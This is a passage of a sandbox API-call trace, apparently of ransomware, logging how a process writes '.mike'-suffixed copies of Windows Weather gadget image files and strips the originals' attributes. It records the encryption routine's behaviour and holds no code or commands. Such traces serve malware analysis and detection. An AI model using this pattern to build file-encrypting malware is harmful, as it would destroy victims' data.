lpOldMode=0x2aeffc) returned 1 [0134.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0134.941] WriteFile (in: hFile=0x284, lpBuffer=0x21d4018*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21d4018*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0134.942] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.mike", lpFilePart=0x0) returned 0x60 [0134.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0134.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0134.942] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.mike", lpFilePart=0x0) returned 0x60 [0134.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.943] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png", dwFileAttributes=0x80) returned 0 [0134.944] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png", lpFilePart=0x0) returned 0x5b [0134.944] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.mike", lpFilePart=0x0) returned 0x60 [0134.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0134.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0134.945] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.mike", lpFilePart=0x0) returned 0x60 [0134.946] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png", lpFilePart=0x0) returned 0x60 [0134.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0134.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0134.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0134.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0134.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0134.948] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0134.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.950] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", lpFilePart=0x0) returned 0x65 [0134.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0134.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0134.950] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png", lpFilePart=0x0) returned 0x60 [0134.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0134.951] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", lpFilePart=0x0) returned 0x65 [0134.951] WriteFile (in: hFile=0x284, lpBuffer=0x21d98bc*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21d98bc*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0134.952] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0134.955] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", lpFilePart=0x0) returned 0x65 [0134.955] SetFilePointer (in: hFile=0x284, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0134.956] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", lpFilePart=0x0) returned 0x65 [0134.956] WriteFile (in: hFile=0x284, lpBuffer=0x21eb0d8*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21eb0d8*, lpNumberOfBytesWritten=0x2af074*=0x1d0, lpOverlapped=0x0) returned 1 [0134.958] WriteFile (in: hFile=0x284, lpBuffer=0x21ee354*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21ee354*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0134.958] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", lpFilePart=0x0) returned 0x65 [0134.958] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", lpFilePart=0x0) returned 0x65 [0134.959] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png", dwFileAttributes=0x80) returned 0 [0134.960] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png", lpFilePart=0x0) returned 0x60 [0134.960] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", lpFilePart=0x0) returned 0x65 [0134.960] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.mike", lpFilePart=0x0) returned 0x65 [0134.963] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0134.963] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.963] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.mike", lpFilePart=0x0) returned 0x5f [0134.964] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png", lpFilePart=0x0) returned 0x5a [0134.964] WriteFile (in: hFile=0x284, lpBuffer=0x21f3b48*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21f3b48*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0134.965] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0134.968] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.mike", lpFilePart=0x0) returned 0x5f [0134.969] WriteFile (in: hFile=0x284, lpBuffer=0x220894c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x220894c*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0134.970] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.mike", lpFilePart=0x0) returned 0x5f [0134.970] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.mike", lpFilePart=0x0) returned 0x5f [0134.970] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png", dwFileAttributes=0x80) returned 0 [0134.972] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png", lpFilePart=0x0) returned 0x5a [0134.972] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.mike", lpFilePart=0x0) returned 0x5f [0134.972] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.mike", lpFilePart=0x0) returned 0x5f [0134.973] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png", lpFilePart=0x0) returned 0x59 [0134.975] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.975] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", lpFilePart=0x0) returned 0x5e [0134.976] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png", lpFilePart=0x0) returned 0x59 [0134.976] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", lpFilePart=0x0) returned 0x5e [0134.976] WriteFile (in: hFile=0x284, lpBuffer=0x220e024*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x220e024*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0134.978] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0134.981] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", lpFilePart=0x0) returned 0x5e [0134.981] SetFilePointer (in: hFile=0x284, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0134.982] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", lpFilePart=0x0) returned 0x5e [0134.982] WriteFile (in: hFile=0x284, lpBuffer=0x222237c*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x222237c*, lpNumberOfBytesWritten=0x2af074*=0x880, lpOverlapped=0x0) returned 1 [0134.986] WriteFile (in: hFile=0x284, lpBuffer=0x22255dc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22255dc*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0134.986] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", lpFilePart=0x0) returned 0x5e [0134.987] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", lpFilePart=0x0) returned 0x5e [0134.987] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png", dwFileAttributes=0x80) returned 0 [0134.988] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png", lpFilePart=0x0) returned 0x59 [0134.988] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", lpFilePart=0x0) returned 0x5e [0134.988] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.mike", lpFilePart=0x0) returned 0x5e [0134.990] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png", lpFilePart=0x0) returned 0x5a [0134.991] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.992] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.mike", lpFilePart=0x0) returned 0x5f [0134.992] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png", lpFilePart=0x0) returned 0x5a [0134.993] WriteFile (in: hFile=0x284, lpBuffer=0x222acd0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x222acd0*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0134.994] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0134.997] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.mike", lpFilePart=0x0) returned 0x5f [0134.997] SetFilePointer (in: hFile=0x284, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0134.998] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.mike", lpFilePart=0x0) returned 0x5f [0134.998] WriteFile (in: hFile=0x284, lpBuffer=0x223fb78*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x223fb78*, lpNumberOfBytesWritten=0x2af074*=0xa60, lpOverlapped=0x0) returned 1 [0135.000] WriteFile (in: hFile=0x284, lpBuffer=0x2242ddc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2242ddc*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0135.001] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.mike", lpFilePart=0x0) returned 0x5f [0135.001] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.mike", lpFilePart=0x0) returned 0x5f [0135.001] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png", dwFileAttributes=0x80) returned 0 [0135.002] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.mike", lpFilePart=0x0) returned 0x5f [0135.003] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.mike", lpFilePart=0x0) returned 0x5f [0135.005] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.006] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.mike", lpFilePart=0x0) returned 0x5e [0135.006] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png", lpFilePart=0x0) returned 0x59 [0135.007] WriteFile (in: hFile=0x284, lpBuffer=0x22484b4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22484b4*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0135.019] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.mike", lpFilePart=0x0) returned 0x5e [0135.020] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.mike", lpFilePart=0x0) returned 0x5e [0135.020] WriteFile (in: hFile=0x284, 